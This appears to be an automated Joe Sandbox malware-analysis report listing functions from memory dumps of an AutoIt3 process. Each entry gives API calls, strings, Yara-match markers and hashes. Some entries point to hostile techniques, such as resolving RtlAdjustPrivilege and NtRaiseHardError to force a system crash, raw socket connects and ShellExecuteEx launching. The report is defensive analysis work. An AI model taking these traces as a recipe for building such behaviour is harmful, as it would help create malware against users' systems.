Opcode Fuzzy Hash: cdf1f1381486cc7b20e9a26e79d0e0c57614cb6f88af5a64390c3cabfdf1a77a
Instruction Fuzzy Hash: 8B310330604290AFDB21CF18DE88F6937E1FB49710F2841A9F9298F2B1CB71AD41DB51

Function 00C9E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E2F0
SysAllocString.OLEAUT32(00000000), ref: 00C9E2F3
SysAllocString.OLEAUT32(?), ref: 00C9E311
SysFreeString.OLEAUT32(?), ref: 00C9E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00C9E33F
SysAllocString.OLEAUT32(?), ref: 00C9E34D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 8b7680b5abedcb48c7cb3c5a9fb0258631d08f7b2db7430c23bf6c1397186bbd
Instruction ID: 80ea06e186695741ca582712329d6567811955cc9608f7edec314ccf4d14c6aa
Opcode Fuzzy Hash: 8b7680b5abedcb48c7cb3c5a9fb0258631d08f7b2db7430c23bf6c1397186bbd
Instruction Fuzzy Hash: 7921A976605219BF9F50DFA8DC88EBF77ACFB18360B544126FA18DB260D670DD418760

Function 00CB685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00CB84A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00CB68B1
WSAGetLastError.WSOCK32(00000000), ref: 00CB68C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB68F9
connect.WSOCK32(00000000,?,00000010), ref: 00CB6902
WSAGetLastError.WSOCK32 ref: 00CB690C
closesocket.WSOCK32(00000000), ref: 00CB6935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00CB694E

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: dc055c525931081f5d564aedeb077f5ecfd808fba096aa4d78385566af0f0bbf
Instruction ID: 70b1bb158fb83d34a172ceb7335e6d6fe42c4398c9bfcb45c0912e0cac80c538
Opcode Fuzzy Hash: dc055c525931081f5d564aedeb077f5ecfd808fba096aa4d78385566af0f0bbf
Instruction Fuzzy Hash: 0031B171600218AFDB10AF64CC85BFE77ADEB44720F144029F915AB2D1CB74AD049BA1

Function 00C9E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C9E3CB
SysAllocString.OLEAUT32(00000000), ref: 00C9E3CE
SysAllocString.OLEAUT32 ref: 00C9E3EF
SysFreeString.OLEAUT32 ref: 00C9E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00C9E412
SysAllocString.OLEAUT32(?), ref: 00C9E420

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 3eda433a955881e98cdedaea7e81a93825db6bc4ec9ba330061cabe8c69923e7
Instruction ID: ad92362444251689857161a407dd969fcdefde84d347811f95391a7962c9a64e
Opcode Fuzzy Hash: 3eda433a955881e98cdedaea7e81a93825db6bc4ec9ba330061cabe8c69923e7
Instruction Fuzzy Hash: A3217735605104BF9F10DFACDC88EAE77ECEB58361B148125FA15CB260D670ED419BA4

Function 0472B080 Relevance: 10.6, APIs: 7, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 04728930: GetObjectA.GDI32(?,00000004), ref: 04728947
Part of subcall function 04728930: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0472896A

GetDC.USER32(00000000), ref: 0472B0BE
CreateCompatibleDC.GDI32(?), ref: 0472B0CA
SelectObject.GDI32(?), ref: 0472B0D7
SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,0472B12F,?,?,?,?,00000000), ref: 0472B0FB
SelectObject.GDI32(?,?), ref: 0472B115
DeleteDC.GDI32(?), ref: 0472B11E
ReleaseDC.USER32(00000000,?), ref: 0472B129

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
String ID:
API String ID: 4046155103-0
Opcode ID: 0e50177c0f2c87ec7d8c3b6c74792cc674c6a38de35ae7bd9c21e53d62236ff0
Instruction ID: 817fbcc12a562f6dc7e6b63b97cdf521a94c48cc7698da2657f41abcd77ae0eb
Opcode Fuzzy Hash: 0e50177c0f2c87ec7d8c3b6c74792cc674c6a38de35ae7bd9c21e53d62236ff0
Instruction Fuzzy Hash: 4D1133B2E042196BEB10EFE8CD91AAEB3BCEB08704F4045A5A644E7240F675BD418B54

Function 04745C58 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,04745D25), ref: 04745C87
GetLastError.KERNEL32(WS2_32.DLL,00000000,04745D25), ref: 04745C9A

Part of subcall function 046F6418: LoadStringA.USER32(00000000,00010000,?,00001000), ref: 046F644A

GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 04745CEB

Strings

WSAStartup, xrefs: 04745CE0
WS2_32.DLL, xrefs: 04745C82
WS2_32.DLL, xrefs: 04745CB5

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: Load$AddressErrorLastLibraryProcString
String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
API String ID: 607613470-1314211545
Opcode ID: d99fb79b38de475658d278f302554f16395cc85623d3a6092fcb909f54cb95b2
Instruction ID: 3e30f28cba5c1bd340b90b68eb88d82fe2a95752baa36451278c71750da02924
Opcode Fuzzy Hash: d99fb79b38de475658d278f302554f16395cc85623d3a6092fcb909f54cb95b2
Instruction Fuzzy Hash: 0E216375604304BFE701EFB4D888AAE77F8EB88304F418569E600D7740E77479448F54

Function 04723378 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 61sleepCOMMON

Download Yara Rule

APIs

ShellExecuteEx.SHELL32(0000003C), ref: 047233DF
Sleep.KERNEL32(00000001), ref: 047233EA
GetExitCodeProcess.KERNEL32(?,?), ref: 047233F7
CloseHandle.KERNEL32(?,00000001), ref: 04723416

Strings

@, xrefs: 047233A8
<, xrefs: 047233A1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CloseCodeExecuteExitHandleProcessShellSleep
String ID: <$@
API String ID: 2207808342-1426351568
Opcode ID: e3d0c19151e31775bbe2a6e9b0defa3bc7237be9a4a91e479f419b5ac9f512eb
Instruction ID: 22835cd44a13203a9be194524be03a2a84b8d67031eeac07bc17e916798fcf4c
Opcode Fuzzy Hash: e3d0c19151e31775bbe2a6e9b0defa3bc7237be9a4a91e479f419b5ac9f512eb
Instruction Fuzzy Hash: 52112471D006189BEB10DFE9DD80ADEFBF8EF48314F54412AAA68E7350E734AA018B54

Function 046FBD24 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 046FBB8C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 046FBBA8
Part of subcall function 046FBB8C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 046FBBCC
Part of subcall function 046FBB8C: GetModuleFileNameA.KERNEL32(00C40000,?,00000105), ref: 046FBBE7
Part of subcall function 046FBB8C: LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 046FBC8B

CharToOemA.USER32(?,?), ref: 046FBD5B
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 046FBD78
WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 046FBD7E
GetStdHandle.KERNEL32(000000F4,046FBDE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 046FBD93
WriteFile.KERNEL32(00000000,000000F4,046FBDE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 046FBD99
LoadStringA.USER32(00000000,0000FFEB,?,00000040), ref: 046FBDBB
MessageBoxA.USER32(00000000,?,?,00002010), ref: 046FBDD1

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 9356dbc6431ecb4036c1cba5589081dda3359591f03184f2495db3ca682b5a69
Instruction ID: 4f5405b21f6ab35bae670503e4e2ecd1806f13e19f7afe348eca18712368daae
Opcode Fuzzy Hash: 9356dbc6431ecb4036c1cba5589081dda3359591f03184f2495db3ca682b5a69
Instruction Fuzzy Hash: 871148B25442056AE200EBA4CC81F8B77ECAB44604F40496AB794D60D0FAB4F9058B6A

Function 04722D78 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43registrywindowCOMMON

Download Yara Rule

APIs

LoadIconA.USER32(00000000,00007F00), ref: 04722DA4
LoadCursorA.USER32(00000000,00007F00), ref: 04722DB4
RegisterClassA.USER32 ref: 04722DD8

Part of subcall function 046F6F0C: CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 046F6F4B

UpdateWindow.USER32(00000000), ref: 04722E14

Strings

API, xrefs: 04722DFF
YourAppClass, xrefs: 04722D7B, 04722E04

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: LoadWindow$ClassCreateCursorIconRegisterUpdate
String ID: API$YourAppClass
API String ID: 4027696755-973248557
Opcode ID: 32ca7fc562f71472a84ce48ac3910a9c2803a4a86d847d6eec4050cc7bdac714
Instruction ID: ffaeae1c71f9a0fab7b2d8b57b5e7d081912f250e49baf923b3d4198a7491cb1
Opcode Fuzzy Hash: 32ca7fc562f71472a84ce48ac3910a9c2803a4a86d847d6eec4050cc7bdac714
Instruction Fuzzy Hash: 6F01EC70A493006FF340DF38CC01B5B76E5EB44B04F10496DB688EA3C5E6B8F9458B8A

Function 0471DBE4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(ntdll.dll), ref: 0471DBED
GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 0471DBFE
GetProcAddress.KERNEL32(00000000,NtRaiseHardError), ref: 0471DC0D

Strings

RtlAdjustPrivilege, xrefs: 0471DBF8
ntdll.dll, xrefs: 0471DBE8
NtRaiseHardError, xrefs: 0471DC07

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtRaiseHardError$RtlAdjustPrivilege$ntdll.dll
API String ID: 2238633743-3189222469
Opcode ID: 42f963401684032ecd14b2b66980f12275688beff2013e4ebb9a970e126987d1
Instruction ID: 5bddeba34b89da0ba500d5aaa6bdfb9f897048d789a4a7b8e757cb93d15c0df4
Opcode Fuzzy Hash: 42f963401684032ecd14b2b66980f12275688beff2013e4ebb9a970e126987d1
Instruction Fuzzy Hash: 6DF0BE702843417FF3306F688D8AF5B7A988B80B15F108C18B286692E0D7F5B0588E56

Function 00C641B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00C64282,?), ref: 00C641D3
GetProcAddress.KERNEL32(00000000), ref: 00C641DA
EncodePointer.KERNEL32(00000000), ref: 00C641E6
DecodePointer.KERNEL32(00000001,00C64282,?), ref: 00C64203

Strings

combase.dll, xrefs: 00C641CE
RoInitialize, xrefs: 00C641C2

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 83b62f4ab4bc0ab354b4d2f6a4c911fa476fc1e353324bfe846470b40e8cd3f3
Instruction ID: adf04b8317e4c2932622c8618a348cfbbbbe5a153041c7e1c7fda50037514309
Opcode Fuzzy Hash: 83b62f4ab4bc0ab354b4d2f6a4c911fa476fc1e353324bfe846470b40e8cd3f3
Instruction Fuzzy Hash: F7E09A30E91301EFDB201B74EC8DB0D36A5A711B06F604425B901D52B4CBB40581CF21

Function 00C6428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00C641A8), ref: 00C642A8
GetProcAddress.KERNEL32(00000000), ref: 00C642AF
EncodePointer.KERNEL32(00000000), ref: 00C642BA
DecodePointer.KERNEL32(00C641A8), ref: 00C642D5

Strings

combase.dll, xrefs: 00C642A3
RoUninitialize, xrefs: 00C64297

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: bce4bb3bb397d7d65868d3629413bf72f968587ac4585b11c2a41c0dfa286f57
Instruction ID: 6c047606ef1c8f7cb022e1c36fc9c0441343d424c705ac3bfca30544ac04ab9a
Opcode Fuzzy Hash: bce4bb3bb397d7d65868d3629413bf72f968587ac4585b11c2a41c0dfa286f57
Instruction Fuzzy Hash: 29E0B670552700ABDB509B64BD4DB4A3BA5B744B02F70012AF505D52B4CBB44614CE22

Function 00C4218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C421B8
GetWindowRect.USER32(?,?), ref: 00C421F9
ScreenToClient.USER32(?,?), ref: 00C42221
GetClientRect.USER32(?,?), ref: 00C42350
GetWindowRect.USER32(?,?), ref: 00C42369

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 407564e6b1d74a8540402550ef14da85c1a4b9466bc10c3bb9b1b161eae41be6
Instruction ID: 866e3bea858b83fd22aa45c6693522de327c60efc66198e87cb5320958b9078d
Opcode Fuzzy Hash: 407564e6b1d74a8540402550ef14da85c1a4b9466bc10c3bb9b1b161eae41be6
Instruction Fuzzy Hash: 0AB17A39900249DBDF10CFA9C9817EEB7B1FF08710F548129ED69AB254EB70AE50DB64

Function 00CA6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00CA6BC6
_memmove.LIBCMT ref: 00CA6B01

Part of subcall function 00C44D37: __itow.LIBCMT ref: 00C44D62
Part of subcall function 00C44D37: __swprintf.LIBCMT ref: 00C44DAC

_memmove.LIBCMT ref: 00CA6B74
_memmove.LIBCMT ref: 00CA6C5B
_memmove.LIBCMT ref: 00CA6C74
_memmove.LIBCMT ref: 00CA6C90

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 93d4c60729d7354d57abe0a857fecb3d1498ef198ce56d5603a4327e8f28dd95
Instruction ID: d56ffc030314bea180959d78e2bd91e5db5e8d4eb992cd169af0ddd008ca6b8b
Opcode Fuzzy Hash: 93d4c60729d7354d57abe0a857fecb3d1498ef198ce56d5603a4327e8f28dd95
Instruction Fuzzy Hash: DE61AD3150029AABCF15EF60CC85FFE37A9AF06308F084559FC59AB292DB359D45EB60

Function 00CC0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C51A36: _memmove.LIBCMT ref: 00C51A77

Part of subcall function 00CC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CC040D,?,?), ref: 00CC1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CC091D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CC095D
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CC0980
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CC09A9
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CC09EC
RegCloseKey.ADVAPI32(00000000), ref: 00CC09F9

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 7e56b9e487f0650a721c1c3f13daa0a8be07ccfdf8cdf76ce45d87409d96363a
Instruction ID: e2fb04ec4952743031d4a570bcb0ef3550d80cf82c1871faa776ca26ba929da2
Opcode Fuzzy Hash: 7e56b9e487f0650a721c1c3f13daa0a8be07ccfdf8cdf76ce45d87409d96363a
Instruction Fuzzy Hash: 78514731208200AFD714EF64C885F6EBBA9FF85314F14491DF999872A2DB31EA45DB52

Function 00CA29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CA29FF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA2A4A
IsMenu.USER32(00000000), ref: 00CA2A6A
CreatePopupMenu.USER32 ref: 00CA2A9E
GetMenuItemCount.USER32(000000FF), ref: 00CA2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00CA2B2D

Memory Dump Source

Source File: 00000008.00000002.2389808880.0000000000C41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000008.00000002.2389774939.0000000000C40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389874009.0000000000CF6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389935437.0000000000D00000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000008.00000002.2389959294.0000000000D09000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c40000_Autoit3.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 19ec6af9dafa5fffc1d391361c109727c2b0f640632e0f3250ffb3214d804c52
Instruction ID: 6ab7c859391c792543710cdf47aeeb66c6469bd667cb5d76a98063b47ed2d9e6
Opcode Fuzzy Hash: 19ec6af9dafa5fffc1d391361c109727c2b0f640632e0f3250ffb3214d804c52
Instruction Fuzzy Hash: 9951927060026BDFDF25CF6CE884BAEBBF4AF56318F104159E822972A1D7709E44DB61

Function 047089A0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,?,00000000,04708AFA), ref: 047089EF
CharNextA.USER32(?,?,00000000,04708AFA), ref: 04708A6E
CharNextA.USER32(?,?,00000000,04708AFA), ref: 04708A95
CharNextA.USER32(00000000,?,?,00000000,04708AFA), ref: 04708AAC

Strings

, xrefs: 04708A3D

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-3916222277
Opcode ID: d59e6742f69d5b4bc37f9a2d7af156a7e240f038d42e74609f5792c2cda42d1b
Instruction ID: 5b74d43d6823e9b0386dbd6944d861b96921c7bf0887a1662ac4d51415b7ff47
Opcode Fuzzy Hash: d59e6742f69d5b4bc37f9a2d7af156a7e240f038d42e74609f5792c2cda42d1b
Instruction Fuzzy Hash: 55416BB0A01144DFDB20EFA8C85485ABBF4EF09304B6288A9E0D1DB791EB30BD41CB55

Function 0470A414 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0470A41F
GetCurrentThreadId.KERNEL32 ref: 0470A42E

Part of subcall function 0470A3C8: ResetEvent.KERNEL32(00000260,0470A469), ref: 0470A3CE

RtlEnterCriticalSection.NTDLL(047528C4), ref: 0470A473
InterlockedExchange.KERNEL32(0474F444,?), ref: 0470A48F
RtlLeaveCriticalSection.NTDLL(047528C4), ref: 0470A4E8
RtlEnterCriticalSection.NTDLL(047528C4), ref: 0470A547

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: ebf3dc473780e7ccb287f1cadb819dd7d0ede1438a12e96f24c4f5d23ce641f8
Instruction ID: cbe9ae3f96190be136c858d9db6a59b166b28ca97bff45af4b13ac0803cbb2d0
Opcode Fuzzy Hash: ebf3dc473780e7ccb287f1cadb819dd7d0ede1438a12e96f24c4f5d23ce641f8
Instruction Fuzzy Hash: 5931DF70A04744EFE701EFA8DC55A6EB7F8EB18704F91C4A4E900A67A0E774B900CE60

Function 04717F64 Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04717F80
MessageBoxA.USER32(00000000,0471809C,04718098,00000000), ref: 04717F9A
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04717FA2
ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04717FC4
MessageBoxA.USER32(00000000,047180A0,04718098,00000000), ref: 04717FDB
CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 04718085

Memory Dump Source

Source File: 00000008.00000002.2391824798.00000000046F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 046F1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_46f1000_Autoit3.jbxd

Yara matches

Similarity

API ID: File$Message$CloseCreateHandleReadSize
String ID:
API String ID: 2324011479-0
Opcode ID: eca8cc23e5ed04bef5c0c08c5dca539417199574e5e17a9f72b135181dae5084
